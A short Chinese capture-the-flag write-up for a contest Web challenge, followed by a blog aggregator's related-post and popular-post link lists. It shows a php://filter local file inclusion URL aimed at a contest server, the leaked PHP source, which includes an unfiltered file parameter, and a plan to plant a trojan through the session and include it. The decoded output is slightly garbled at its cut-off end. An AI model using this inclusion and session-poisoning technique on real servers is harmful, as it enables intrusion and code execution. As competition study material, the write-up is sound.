题中提到了1.txt和2.txt，当时我在这两个位置徘徊了挺久，后来想到试一下直接用base64读取action.php这个文件：

119.23.247.96:48002/action.php?file=php://filter/read=convert.base64-encode/resource=action.php

出现：
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmVycm9yX3JlcG9ydGluZygwKTsNCiRuYW1lID0gJF9QT1NUWyduYW1lJ107DQppZigkbmFtZSl7DQoJJF9TRVNTSU9OWyJ1c2VybmFtZSJdID0gJG5hbWU7DQp9DQppbmNsdWRlKCRfR0VUWydmaWxlJ10pOw0KPz4NCjwhRE9DVFlQRSBodG1sPg0KPGh0bWw
Base64解密：

解密后内容如下：

<?phpsession_start();error_reporting(0);$name = $_POST['name'];if($name){$_SESSION["username"] = $name;}include($_GET['file']);
?>
<!DOCTYPE html>
<htbWw

发现session开启并且可控

在name处写入木马
包含即可获得flag

【广东大学生网络攻防大赛-WriteUp（非官方）】Web | in相关推荐

1. 2019年安徽省大学生网络攻防赛赛前培训——Day1

   2019安徽省大学生网络攻防赛方案 高职组(AWD模式) 实时防护 无差别攻击 一对多.多对一 分值不封顶 范围 web类.系统安全.数据安全.溢出等 时长 总计3小时,前0.5小时加固,后2.5小时 ...

2. 第四届“蓝帽杯”全国大学生网络安全 技能大赛 Writeup

   第四届"蓝帽杯"全国大学生网络安全 技能大赛 Writeup Misc 签到 sudo 熟悉的解密 Web 文件包含绕过 easiestSQLi Soitgoes Misc 签到 ...

3. 华师计算机设计大赛,2017年广东大学生计算机设计大赛决赛选手手册-华南师范大学.PDF...

   2017年广东大学生计算机设计大赛决赛选手手册-华南师范大学 2017 年广东省大学生 计算机设计大赛决赛 选手手册 主办单位:广东省教育厅 承办单位:广东外语外贸大学 指导单位:广东省高等学校公共计 ...

4. 20155235 《网络攻防》 实验八 Web基础

   20155235 <网络攻防> 实验八 Web基础 实验内容 Web前端HTML(0.5分) 能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表 ...

5. 南京邮电大学网络攻防平台WriteUP——WEB（上）

   前言 南京邮电大学网络攻防平台(http://ctf.nuptsast.com/)是一个集合了WEB.MISC.密码学.PWN.逆向的一个CTF训练平台,对于初次涉及ctf小伙伴来说是非常不错的一个训 ...

6. 2016风云杯大学生信安大赛 WriteUp

   2016风云杯大学生信安大赛 web 01 web 02 web 03 web 04 web 05 web 06 web 08 web 09 CRYPTO 01 misc 01 misc 02 mis ...

7. 广东大学生计算机设计大赛,我校学子在广东省大学生计算机设计大赛中荣获一等奖...

   本网讯(通讯员 李玫)近日,由广东省教育厅组织的2017年广东省大学生计算机设计大赛决赛在广东外语外贸大学白云校区举行,我校信息技术学院组织和选拔的参赛作品经过层层筛选,最终获得一等奖1项.三等奖2项 ...

8. 2020大学生网络知识大赛总决赛个人12——18急救包（最后还是肝完了，累~）

   1.强制性标准是由法律规定必须遵照执行的标准,强制性国家标准的代号为() A.GB:B.GB/T:C.JB:D.JB/T 正确答案是:A 2.计算机越来越普遍,而操作系统用于管理和控制计算机的硬件和软 ...

9. 2019年安徽省大学生网络攻防赛赛前培训——Day2

   AWD(高职组)比赛思路 流量分析虚拟机,下载流量文件进行数据分析(可能无)* flag刷新 flag被拿走,该队扣分,攻击者得分 主办方对队伍的服务器进行check,扣分.得分由其他队伍均分 数据库密码 ...

10. 2017广东省红帽杯网络安全攻防大赛writeup

    签到 扫码按操作即得 brian(Y) 打开题目,发现是一段字符: +++++ +++++ [->++ +++++ +++<] >++.+ +++++ .<+++ [-> ...

最新文章

1. elasticsearch简单操作（二）
2. LeetCode Guess Number Higher or Lower II(动态规划)
3. muduo网络库源码阅读Step by Step
4. 使用Handlerf发送消息或使用Handler轮询时，报错IllegalStateException：This message is already in use.；...
5. 关于MongoDB时区问题
6. 机智云CEO黄灼：优秀的企业在何时都不会遇到融资困境
7. invest模型的python安装方法，两种方法
8. python int too large to convert to C long
9. app接口制作简单流程
10. 学习2 游戏交互界面设计（贪食豆）
11. 如何在win10电脑上录音
12. 实验楼Linux基础挑战2答案,实验楼-Linux基础-实验二 Linux的基本概念及操作
13. 计算机组成原理徐福培,徐福培计算机组成原理(第2章).ppt
14. PS网页设计教程XVI——在PS中创建一个摩登实验室风格的网页设计
15. 【初学者必看】vlc实现的rtsp服务器及转储H264文件
16. 超过4G如何制作NTFS格式WINPE？
17. 爬虫入门经典(十) | 一文带你快速爬取网易云音乐
18. 双目视觉目标追踪及三维坐标获取—python（代码）
19. MATLAB实现正弦频谱分析学习笔记
20. 福布斯:历史上十大商业败笔

热门文章

1. 测试用例设计方法详解
2. mongodb 库数量限制_MongoDB数据库勒索野蛮生长 数量已达27000多个
3. 最全公司章程自由规定事项
4. Java IO基础详解
5. 第8代CPU i5-8250U 电脑安装核显 Windows 7 x64位驱动
6. 选项卡切换 内容也跟着变 微信小程序
7. 等保2.0二级通用要求
8. python2安装biopython
9. vue 富文本编辑器上传图片到服务器并显示到富文本中
10. go int转byte